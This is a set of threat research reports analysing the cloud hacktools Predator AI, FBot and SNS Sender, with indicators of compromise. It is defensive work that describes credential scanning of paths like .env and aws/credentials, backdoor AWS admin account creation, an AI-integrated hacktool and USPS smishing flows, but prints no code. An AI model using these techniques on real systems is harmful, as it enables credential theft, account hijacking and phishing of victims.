This function queries https://api.twilio.com/2010-04-01/Accounts.json with SID and token as arguments. If "message":"Authenticat" is not in the response, the script parses the response for the fields status, type, and balance. If “status” is not in the response, the script parses the response for balance and currency fields. If status returns as active, the script logs the values of SID, TOKEN,  TYPE,  STATUS,  BALANCE to the file Result/TwilioChecker/result.txt.

GhostTrack

There are several other utilities nested under a function named GhostTrack.

• IP_Track: Collects information about a given IP address via the ipwho[.]is service.
• phoneGW: Uses the phonenumbers Python module to format input phone numbers in a standard way and check information about the phone number, such as whether it is a landline or mobile number.
• TrackLu: Checks one of 23 social media services for a username matching the input argument. The function checks for a 200 status code, which is not effective in the case of private profiles and there are likely many site-specific edge cases.
• checkIP: Queries api.abuseipdb[.]com to collect information about the given IP address related to abuse metrics, such as an abuse confidence score.

The author included several conditions to handle a user query about the nature of the chat utility, along with a statement that claims the author spent three days developing this feature.

StealerBuilder

This class contains configuration variables to build an infostealer. On October 16 2023, the project developer posted a video about Predator that shows the Stealer build process. A user asked if the resulting executable is fully undetectable, to which the developer replied, “Of course.”

The stealer can be configured to use Discord or Telegram webhooks for C2. The operator can specify an existing executable to insert the infostealer code into. During testing, we were unable to successfully use this feature as the required configuration files were not available. The features visible in the script we analyze indicate that Predator parses files from a Scripts directory and uses those to build either a Windows Portable Executable (PE) file or a Python script version of the stealer module.

Conclusion

The discovery of Predator AI is an entirely expected evolution that has previously been undocumented in the hacktool space. Since the recent wave of AI technologies entered the public domain, security professionals have questioned whether this technology was already aiding threat actors and how it could be used to scale actor operations. There were several projects like BlackMamba that ultimately were more hype than the tool could deliver. Predator AI is a small step forward in this space: the actor is actively working on making a tool that can utilize AI.

While Predator AI is likely somewhat functional, this integration does not substantially increase an attacker’s capability. The feature has not yet been advertised on the actor’s Telegram channel, and there are likely many edge cases that make it unstable and potentially expensive.

Like other cloud service attack tools, organizations can reduce the impacts from these tools by keeping web services patched and up to date, as well as keeping internet access restricted to what is necessary. Use cloud security posture management (CSPM) tools to validate that configurations are secure. Consider dedicated logging and detections for anomalous behaviors on cloud service provider (CSP) resources, such as new user accounts being added and deletion of another user account immediately after.

Indicators of Compromise

SHA-1 Hash

88d40f86eefee5112515b73cce2d2badb7f49ffd – main.py Predator Python script

Hardcoded Strings

• “jSDSgnditikunggobloktolol” – hardcoded AWS account name string
• “titid” – hardcoded username in AWS GPT functionality
• “Adminn” – hardcoded username in AWS GPT functionality
• “Predator123” – hardcoded password from the Settings class
• “admainkontolpaslodsajijsd21334#1ejeg2shehhe” – hardcoded password for ‘Kontolz’ user account
• arn:aws:iam::320406895696:user/Kontolz – example ARN for Kontolz user

Executive Summary

• FBot is a Python-based hacking tool distinct from other cloud malware families, targeting web servers, cloud services, and SaaS platforms like AWS, Office365, PayPal, Sendgrid, and Twilio.
• FBot does not utilize the widely-used Androxgh0st code but shares similarities with the Legion cloud infostealer in functionality and design.
• Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts.
• FBot is characterized by a smaller footprint compared to similar tools, indicating possible private development and a more targeted distribution approach.

Overview

The cloud hacktool scene is highly intertwined, with many tools relying on one another’s code. This is particularly true for malware families like AlienFox, Greenbot, Legion, and Predator, which share code from a credential scraping module called Androxgh0st.

We identified a tool that is related but distinct from these families. FBot is a Python-based attack tool with features to target web servers and cloud services as well as Software-as-a-Service (SaaS) technologies, including:

• Amazon Web Services (AWS)
• Office365
• PayPal
• Sendgrid
• Twilio

FBot is unique in that it does not apparently adapt the Androxgh0st code so common among similar hacktools, though the earliest reference to FBot is one year more recent than the first sighting of Androxgh0st. However, there are several connections to the Legion cloud infostealer, making it likely the Legion maintainer adapted code from FBot into their tool.

FBot is primarily designed for actors to hijack cloud, SaaS, and web services. There is a secondary focus on obtaining accounts to conduct spamming attacks. Actors can use the credential harvesting features to obtain initial access, which they can sell to other parties.

The tool contains assorted utilities, including an IP address generator and port scanner. There is also an email validator function, which uses an Indonesian technology service provider to validate email addresses.

AWS Targeting

FBot has three functions dedicated to AWS account attacks. The first is an AWS API Key Generator, handled by function aws_generator, which generates a random AWS access key ID by appending 16 randomly selected alphabetic characters to the standard AKIA prefix. Then, it generates a secret key from 40 randomly selected alphabetic characters.

Despite FBot’s apparent lack of adopting the Androxgh0st modules, the same feature was highlighted in research on the Legion stealer as well as an older Androxgh0st variant, and it has not changed significantly. We agree with the aforementioned researchers’ conclusion that this feature is unlikely to succeed at brute forcing account credentials due to the possible number of access key and password combinations.

The second AWS feature is a Mass AWS Checker, handled by function aws_checker. This function checks for AWS Simple Email Service (SES) email configuration details, including the maximum send quota and rate, as well as how many messages have been sent in the past 24 hours, likely to maximize spamming efforts against the targeted account. It also creates a new user account with the username iDevXploit and the password MCDonald2021D#1337 and attaches the AdminsitratorAccess policy to elevate privileges for the new account. Unlike other cloud attack tools such as AlienFox, FBot does not delete the compromised account that the attacker used to gain access.

The third and final AWS feature is an AWS EC2 Checker, with the description Get EC2 VCPU Limit, which is handled by function ec_checker. This function reads a list of AWS identities from a text file in the format of AccessKey|SecretKey|Region. The script uses these values to check the targeted account’s EC2 service quotas. The FBot menu highlights that this can be used to check vCPU details, although the output is less straightforward. The query results describe the account’s EC2 configurations and capabilities, such as what types of EC2 instances can run. The script iterates through a list of specified AWS regions, runs the query again for each region, and logs the result to a text file.

SaaS & Payment Services Targeting

FBot has several features that target payment services as well as SaaS configurations.

The PayPal Validator feature is handled by paypal_validator. This function validates PayPal account status by contacting a hardcoded URL with an email address read from an input list. The email is added to the request in the customer details section to validate whether an email address is associated with a PayPal account.

The script initiates the Paypal API request via the website hxxps://www.robertkalinkin.com/index.php, which is a Lithuanian fashion designer’s retail sales website. Interestingly, all identified FBot samples use this website to authenticate the PayPal API requests, and several Legion Stealer samples do as well.

PayPal Validator crafts the request to this site with a fake item ID as well as phony customer details, then parses the response for a status message indicating success.

FBot also targets several SaaS platforms, including Sendgrid and Twilio. The Sendgrid feature is a Sendgrid API Key Generator, which generates a Sendgrid key formatted like:

SG.{22 characters from [A-Z0-9-_]}.{1 more character from previous range}

The Twilio feature takes the Twilio SID and Twilio Auth Token as input, separated by a pipe. The function then checks the SID & auth token combination for details about the account, including the balance and which currency, a list of phone numbers connected to the account.

Web Framework Features

FBot has features for validating if URLs host a Laravel environment file and for extracting credentials from those files. The Hidden Config Scanner feature takes a URL as input and crafts an HTTP GET request to several PHP, Laravel, and AWS-related URIs where configuration values may be stored, including:

_profiler/phpinfo	config.js
.env	config/aws.yml
.env.bak	info.php
aws.yml	phpinfo
aws/credentials	phpinfo.php

The response is parsed for keys and secrets related to the following services and the result is written to a text file:

AWS	MandrillApp
Coinpayments	Office365
DB_USERNAME (generic database)	Plivo
Ionos	Sendgrid
MAIL_PASSWORD (generic SMTP)	Twilio
Mailgun

FBot also targets several popular Content Management Systems (CMS). The function cms_scanner contains a map of CMS and web frameworks to regular expressions (regex) associated with the service. The program creates a request to the targeted URL and parses the response for the following technologies:

Codeigniter	Laravel	phpBB
Discuz	Lithium	PrestaShop
Drupal	Magento	vBulletin
Esportsify	MediaWiki	Whmcs
FluxBB	Moodle	WordPress
Invision	Ning	YetAnotherForum
Jive	OpenCart	ZenCart
Joomla	osCommerce	Zimbra

Taxonomy

FBot relies on configuration values to be fed to it through a configuration file (.ini), or through headers that initiate the main class. We identified one version that is compiled as a Windows executable.

The string iDevXploit is present across all samples: this handle is credited as the author in the main class. Additionally, the aws_checker function leaves artifacts in targeted AWS consoles: when FBot creates a new user in the AWS account, the username iDevXploit is consistent across samples, along with the password MCDonald2021D#1337.

Unlike many similar cloud hacktools, FBot does not contain references to the open-source Androxgh0st code found in tools like AlienFox, GreenBot, and Predator. The logic implemented is very similar in that both Androxgh0st and FBot parse environment configuration files for credentials related to similar mail & cloud services, but the implementation is different and no code seems to be directly borrowed.

There is considerable overlap with the Legion cloud infostealer in how the tools scrape URLs for PHP configuration. However, FBot is much smaller and less fully featured than Legion, with FBot samples weighing in at approximately 200 KB and Legion ranging from 800-1200 KB in size.

Conclusion

FBot demonstrates another tool family that continues the trend of adopting cloud attack tool code from one tool into another, while maintaining its own distinct flavor. We have seen samples spanning July 2022 to January 2024, showing there is continued proliferation of this tool. However, there are relatively few changes across versions and it is unclear whether this is actively maintained.

As of this writing, we are unable to identify a distribution channel dedicated to FBot, which differentiates the tool from other cloud infostealers often sold on Telegram. The bot has references to buffer_0x0verfl0w, a Telegram channel associated with various crimeware that has since been retired. However, we found indications that FBot is the product of private development work, so contemporary builds may be distributed through a smaller scale operation. This aligns with the theme of cloud attack tools being bespoke ‘private bots’ tailored for the individual buyer, which is a theme prevalent among AlienFox builds.

Organizations should enable multi-factor authentication (MFA) for AWS services with programmatic access. Create alerts that notify security operations teams when a new AWS user account is added to the organization, as well as alerts for new identities added or major configuration changes to SaaS bulk mailing applications where possible.

Indicators of Compromise

SHA1	Notes
1ad78e99918fd66ed43d42a93d2f910a2173b3c5	Bot.py, January 2024 version of FBot
2becd32162b2b0cb1afc541e33ace3a29dad96f1	April 2023 version of FBot
8ba3fca4deada6dbdc94b17a0c3c55a0b785331e	Bot.py, July 2022 version of FBot
iDevXploit	Hardcoded AWS IAM Username
MCDonald2021D#1337	Hardcoded AWS IAM User password

Executive Summary

• SNS Sender is a script that enables bulk SMS spamming using AWS SNS, aka Smishing, a previously unseen technique in the context of cloud attack tools.
• The script author is currently known by the alias ARDUINO_DAS and is prolific in the phish kit scene.
• The script requires valid AWS SNS credentials compromised from an environment not subject to the SNS sandbox restrictions.
• We identified links between this actor and numerous phishing kits used to target victims’ personally identifiable information (PII) and payment card details.
• The smishing scams often take the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery.

Overview

A common thread between businesses and threat actors is that both are moving workloads previously handled by traditional web servers to the cloud. SentinelLabs has identified one example of this in the form of SNS Sender, a Python script that uses AWS Simple Notification Service (SNS) to send bulk SMS messages for the purpose of spamming phishing links, aka Smishing.

SNS Sender is the first script we encountered using AWS SNS to send spam texts. The script requires access to an AWS account in which the service was already provisioned, configured, and enabled. By default, AWS accounts are subject to restrictions through a feature called the SNS sandbox. These restrictions can be removed if the customer spends $1 and provides a viable use case to AWS support, who manually review such requests. While other tools like AlienFox have used business to customer (B2C) communications platforms such as Twilio to conduct SMS spamming attacks, we are unaware of existing research that details tools abusing AWS SNS to conduct such attacks.

We identified links between the actor behind this tool and many phishing kits used to target victims’ personally identifiable information (PII) and payment card details under the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery. We believe this actor is using cloud services to send bulk SMS phishing messages, though they may still be testing the tool based on some questionable programming choices.

Script Analysis

SNS Sender is a script that enables bulk SMS spamming using AWS SNS. The script requires a list of phishing links named links.txt in its working directory. SNS Sender also takes several arguments that are entered as input:

• A text file containing a list of AWS access keys, secrets, and region delimited by a colon
• A text file containing a list of phone numbers to target
• A sender ID, similar to a display name for a message
• The message content

The send_sns_message function sets up the AWS boto3 client–an interface between the Python script and the AWS SNS backend–to send the SMS messages. The boto3 client variables are obtained through the arguments that the script user provided.

The sender ID variable is an interesting inclusion. According to AWS documentation, this variable is optional and is supported in some countries. In the United States, carriers do not support sender IDs, whereas in India, they are mandatory. The inclusion of a sender ID contrasts with the actor’s association with USPS-themed phishing kits targeting Americans. The oversight may indicate the actor is not familiar with this exception and likely resides in a country where the sender ID is commonplace.

SNS Sender establishes a while loop that iterates through the list of AWS credentials and regions. The script replaces any occurrences of the string linkas in the message content variable with a URL from the links.txt file, which weaponizes the message as a phishing SMS. The link is selected randomly using the Python random library’s choice method.

The script tracks how many AWS access key pairs have been accessed through the a variable and how many phone numbers have been used through the y variable, which are initialized as 0 and incremented by 1 each time the loop runs. Each message is sent using the credentials from one line from the AWS access key pair list, and the tracking ensures that the next line is accessed for the subsequent message.

To run at scale, the list would need to be incredibly long, and likely repeat access key & secret pairs, making this a coding method with questionable efficacy.

Phishing Kits

When investigating the handle ARDUINO_DAS, we identified more than 150 phishing kit files containing references to the actor. More than half of the kits are USPS-themed. The assets in these archives are similar in name to the URIs present in several recent Smishing campaigns using a missed package delivery lure. We believe that the actor abandoned the ARDUINO_DAS handle in 2023 after accusations that the actor scammed buyers. However, some recently circulated phishing kits still reference this handle, which may make it an artifact of actors using the phishing kit.

Due to the link between ARDUINO_DAS and USPS phishing, we explored several active campaigns circulating through early January 2024, hosted on hxxps://usps[.]mytrackingh[.]top and hxxps://u-sipsl[.]cc. Both sites host a USPS-themed phishing site with a flow like:

1. Landing Page: Explains to the visitor that their USPS package is unable to be delivered. The “Click Update” button leads to the next step.
2. Tracking Page: This page looks like USPS tracking details, but it prompts the victim to enter their name, physical address, phone number, and email address.
3. Card Verification Page: This page prompts the user to enter a credit card number for a $0.30 redelivery fee.
4. The server forwards the details to a card checker, which is likely run through a Telegram service.

Conclusion

Actors are continuously finding new tools and platforms they can use to conduct their attack of choice, and SNS Sender is no exception. Spammers have used mega tools like AlienFox and Predator to target bulk mail services as well as business communications services. Other researchers have detailed which APIs have been used during in-the-wild AWS SNS abuse attacks, as well as enumeration routes actors may take to verify a targeted environment’s SNS capabilities. SNS Sender provides a glimpse into how actors conduct these attacks.

SNS Sender represents a more narrow approach that relies on the actor having access to a properly configured AWS SNS tenant. Using AWS presents a challenge for this actor: AWS does not allow SMS notifications via SNS by default. For this feature to work, the tenant needs to be removed from the SNS sandbox environment. This is an update from previous research where AWS automatically allowed accounts to send to 10 destination numbers while an account is in the SNS sandbox.

Organizations using AWS SNS can protect themselves by reviewing the SNS documentation for the latest information. AWS has shared guidance for organizations to learn more about the SNS sandbox and how to change sending limits. Identity and Access Management (IAM) administrators should review identity best practices to optimize their organization’s security posture.

Desire for recognition presents operational security challenges for actors developing tools for the opportunistic cloud hacking scene. The actor including their handle in the script is ubiquitous among cloud hack tools, enabling researchers to form a point of attribution even when delineating the tool families becomes challenging due to extensive overlap.

Indicators of Compromise

8fd501d7af71afee3e692a6880284616522d709e – sns_sender.py, SNS Sender

Phishing URLs

hxxps[:]//perwebsolutions[.]com/js/
hxxps[:]//usps[.]mytrackingh[.]top
hxxps[:]//u-sipsl[.]cc

Phish Kit Archives

01b82c779de9ef59ecd814d6131433f7b17d7eb0
03329461d8003aece83db2c124b5c2769dd0300e
03b0cc3f1576d0d719f5ac5dbba582a9c10e64e0
040e07a1c4cbc7eb9fb2a8ecfb865c0a2f4db5b9
04676e36b9e11f32fd675e96dd721a5a215a0641
0544db064ecb8fd8f36e96ef31d031447011c711
0547074a7cb42a67a933d70c302b626f4e10a86e
09ddd1b6f3dc1323ad86d458da05f5be605c8e7a
0a8ab120e03ed49e18ce3246b9d00f547fd9432c
0bb8a3a478d1143a04fb8abd8aa9c116282cc700
0eaa126cf4414684763b415aabc08e262ee7c194
0fb6fa2855a39f7010d3a1bcc0c08e739747785c
1024d7c1a10e94d0f926cff649a9bd9a0c5df6ba
103a49c6c4f71ab5bbcaa01df89aef80e0c90229
106b42a1a6401f6ff3cb38f66d0668ac22fbc59c
10fe02acfa1053210387bc312f1ff9529eaeba35
138a00f5e6ef81560cdfe25f2ab087c24e839efd
14ea8aa63539498773bb0d4bea5fbede05f1c17d
17a2515096e6afe5976f57887c89d3efe285ed06
1a97f72dedbdf13b13baa4c535398af25a78a28e
1b1940f128bb4f3420ebc4b5ab1a7b165e70003b
1d0a54f030e8b68bbf1256811fbb4a284ce31fda
1e85b4cf222387cddc0f2977d5c9f4a5eb03db06
1fa655639ee1f7d9c8e3157346f65d351d4b3450
1fb3a8a17123f82bf39ae93ede40273f155d5fa1
1fe0823655c30cabf51816ed1048f647172d29c8
20813f948849a05f84ed1b6a707ffc6965d17c1e
25dd30bda5bbfa7af884c0d3a71857b6abcb8222
27b6aaa536200b085d611af07b0c05df8a856eb8
29a4771a04afce2b789fe34b42a12d2fa65073ab
29d49c1d21c9e97c757db81db594e55b15587f98
2ac1467e567bc6e950b8aee96d898b71f9cf5849
2c62c5f3e4166be99bf985a0c5f08cfe5795221d
2d4f45cdfe0793431e0134376b309f1707a4e2e6
2e9bb5c725eee402a36d64f63e07f72451eaec03
319569a20fdaf2fa356f6e33e575a5a613da79b2
32a21398869e2e221552da49fe1d4beba11ad2ca
342d6e453f6a02c43ca4dee045f89cbdaa97926c
357df6a8740bca2b81b62a3a429b2fef5cc883a8
38fcec4299789a1ba16099df0842aa196c34dde6
3b15bf62091a80ec32a2c3af92da5115641cf13b
3ba42572bd49882280306fc72759016c1ea90e7c
3c6dfef72f703bd8a2779a40cef39c4eb2305e69
3d920ba992668bbb303a6680251c54c928fec988
3f31c8c8bf2acdbb3cbe792b2728b3a2eadccaec
3fc724ee8958f941168e16e06ed8f0eccffacde7
403ed75a0a86783a39e65aac0ca8d69d43f7a562
40840c0b6bd9a6a25dd864e7812cb1ee499b10bf
45a39f3af4ca67dea1f920a7bd03fe43b4b38bec
492a0031807ea7defcfb6a0be058580adac88345
4aa1f81a313c991532379f68808a59fdbecef2de
4c95a04759f5edc679122c013d2bb2570cef78dc
4cdbc5d865172d4026a624f0aa56959875ba562c
4d8bcefef73e03784fd104b8cec8bb2e3b47c89b
4f636146bc6661795a4fbde68c5ca5b48e4a462d
508d218b811aaea176b51f577a2cb74ff59ddf6e
50e6703a85b4e72834cef4438f29777c0e73af54
533ba3e5bacf6c982cc827b6aef62817897cf8ea
53c26c8f577e45ba188e18b89da4b54ff41970d0
563bc88fd217b1af0301e7eec2b03051a7236054
56d51c8d5959d33ba4c52643a6436380e4f9fd8b
589a185002c75260b66a29a21939a751d1b49585
5a61394c2b1b0da534a348ecd714810a57194574
5a6f197b77317d5d80dbe59984ccffa11cbc28ac
5aae678fdaada1e58e88fe9a8eabfddfc1fafed1
5bc0e77c722c8b973e8d2627002da3503e26dbde
5dc5dc2206059359df9bc5056dca634b8ca13004
5fe779032a8edf0866832903aac4caa4c22d65cc
60077d66f395c7af28537338bd8fed0e5f108617
601c2e36a2f284ef3bb4752b364da53afe480537
60d209585249f32d0ad24ca295911729d8f56496
64a8d7093ed1f3737901110118c768fb9ded4882
64cb6b72523df13628d2f43f400c719a556c5d86
658a6fe9f5700426d2a6b85dc035ba54b847eede
6594a9357d39e377032fc2b5094ee2f68248bffe
687f843a50e75ea74b8c51487356ee2b1ebfe359
6911cb39a03184324406f79042b648b8ed89c2d9
6c1eefaba836d8a4f86ab8cc7d9a514f045827bb
6cd850c489930ef8d2438174ab38d4c33bc70c45
6d0e9ce56f99c87d9d70e0522b96c625783aece2
7935a5760e10976d9eff013735c303069c669e72
797acd73e43b3f56961d0c687d86009fec832aee
79f93db9c9b5f42c7b26b79c926eb3dfeaee3571
7c53c7119bf6be6c5b149a1fdcb2c22b39bc1470
7c6d96174246fe907a1cb7fbe0f2592c1f8b48b7
7edcdc353071b1c44ce4a8ac33670378a86eb1ba
83e8e7da62463b79970442d2b0de2eccf36450f7
847bb302b6107ac93a669c09552ca158a1440596
87091170ae9ec6e0641d1e689a22e11324e2e4c6
87093850d8084a9a1b1881e0959acf41fcf8799c
87b41c7f499be3b765628874b37d2d0f84d53517
88dfbd8036b122a1efa32b222f985447c7c80b41
8952fbe59931daba401f615bf06b90547b6171a7
8ac6dd99742dd328b690fb6f0552f2c4df2566c6
8bc41965baba7f5e25d4bbb0519c1e4c573734c5
8f06a9204f9a354cdf4dbf4c3ae870d5a386de59
9004df92c9a9427767fdca02b9a1378cff42dbce
91065e8ab12e9fce202c0eac0290cb1bd6c46ae2
912a376b255e3b873a73767679e0fbe9a1b01446
91562cad5eb7a9568190fa4b84da4de50ed3d274
95197a29d05d2043771bc97a5ded6086f6dfbbd2
95e707b5f9257913a36fb276d25e7312a9b86156
97fba04a848da3c09bd906b6b3adb4aa9031e471
98b85e3e2bcff8b5032ddbb9758174dec2bacf58
9954725c56a9060c90b8d5cd0483fc6808f39bd1
99d35595f41a9be3fc077d37599447c096ce66cf
9a2ac6259c2707b34546bee8b5a4eec677716299
9c4593c93cc5a5d7712bee10574823ebca9f6674
9f2faa971f0f4fd783e34d11cba67b261b54cc5c
9f9fbf77fd4c3aeb1542589efdc45d4e328da56c
a19ac9df01a0bc64e636054b0a728e024ade61e9
a2163de2f5056d64a27e96a73f7858b79d47ad06
a38087ce0515cd30fb3580ba12840bc610429649
a7ec178adabbb8eb533a81c658ecce56a9e697da
ab9baecfdf85033e65d59652e666b7328cb0960d
abddb05ed3b75cae4354044bad05e5662cbfbab5
ad0d4cfcc7c35a9a96ad071a4863dbe8f83d87db
adf4765cb74c708496fa39c8c002e32b6f0c1e71
aebdd69f0bbbb8d0d3c231f0fbe1516edc5e0216
b212145149ca3f1c62e991bcf31357ecc8b17851
b2192b99736376f9e5705e81d3b55bce408e17a8
b26d632d14e91634ba01df0b3b18907657025563
b5d8b89c88f32e2c0a9166f48e87f853a497b667
b66c21bb8ef8ffa3143f3a6bae2c67f14eef069a
b6e3c52c1bd309f596b4ba50d0f7487b66bd5701
b7420fb4774e755bdb3062d12eb750687c115a3a
b7a6780990590ac3ebb632b9198b63531d645129
b841b4ae0629a5336356bce88794e0744f72f98b
ba5d94f8852f5cdee14e2bf8e1f0eb1cf599ecfb
bc0e3f1c5b323daf31ecff178c620be0c03efb64
bc3ebc37a77acef15b827e4ee43aeb839bc5605d
be0ca87b74a345d62814cad3916133e3e655acc6
bf9c85e3ed9a3f0a51eeda6284be24b507a5770f
c117393f640ccd1d5fa5b002fcc3803498b61a2d
c283818259bceaddfd62554fdf37493d413b9b84
c547caad7d7517b2026e3c17461c249a925460d3
c60830bac782f58c61a81821da8153f639c86a74
c92c68b12ba817df7eb83666bd478466cb1c423a
cabbe92c9b5acb779f9fb76b1f8e3ed77a44935d
cb27a59e95c5d1b81219ba1cae4225f7340b16f2
cc4306140f14bcec70f103f4213e96e24d065381
ce701e5c639158563455c28bc39efd2051196932
cea7151a8260b9e48b687d40a9062ad361efed2d
cf4872e3e9f580b1865f68bae6b31bca0f0e22e6
cf7f11b4a39792531118058bd1c8ba2a2cabc486
d71c9f3d3aba149d13d7434731423c164cf2f002
d77c1f97339ba891286c10f6456a1e7f44b3c3bb
d78275c82d2f10ba5ed6bfbfec37686a7646d8ea
dc7fd807e8c9fc10185dcc47bc14f7460a4228b3
dd682090d3815b52cf74b22280d1b8db02ef339e
df66269b6826273650716524219dd83cf0302dc4
df7ee28ca069f798489cb4dc2ff1295bb6377a6f
dff37819d805c0fa99f11a466f583f2f752af8b0
e2498ab48872162bab97e7a5737376cec2a5b401
e7dc9e8f82cab9de0ec3b92693cdca726c5d72a6
e95528bd91158bab9d1e998969951209f6d8a3b6
ea4c4495ac7d68543cb423d34704e8fbfd595f6b
eab2f2b4a924397d22ecd1a6e8758de585e9fdcc
ee7105ca1065b6f0f6ce4b041b1a0a95b5678790
eefcbc6b32fdf7167db0b9a455b3c8c0f8d4b58d
ef5a5d04dc048a3c1f6a415be1ad74e1478b802e
ef8b8d215b4cc107495b3957fbedd2317f642cd9
f01c586c97d68847d1f373f7fd45444af26aff7a
f28b3d223a0c351f70ec0c7680e80083c232a470
f351bd5595b1eb2196f5c2ef1c519a7a8a7967dc
f35fd34a90c7a9b827c1d9417b8f088e8302ba01
f3b5e4840139ab0465b3c432d19bae1365e923af
f5b1256e407fb37d44a54ba29dc6fd4815cfde55
f754e4a59c49c0b3e653fdd8fdc04078810524dd
fae99902bef8011459926e4a69b85ae2cf0c0914
fc9d7c59645450be5887f938aaacbca2b0b3f1f9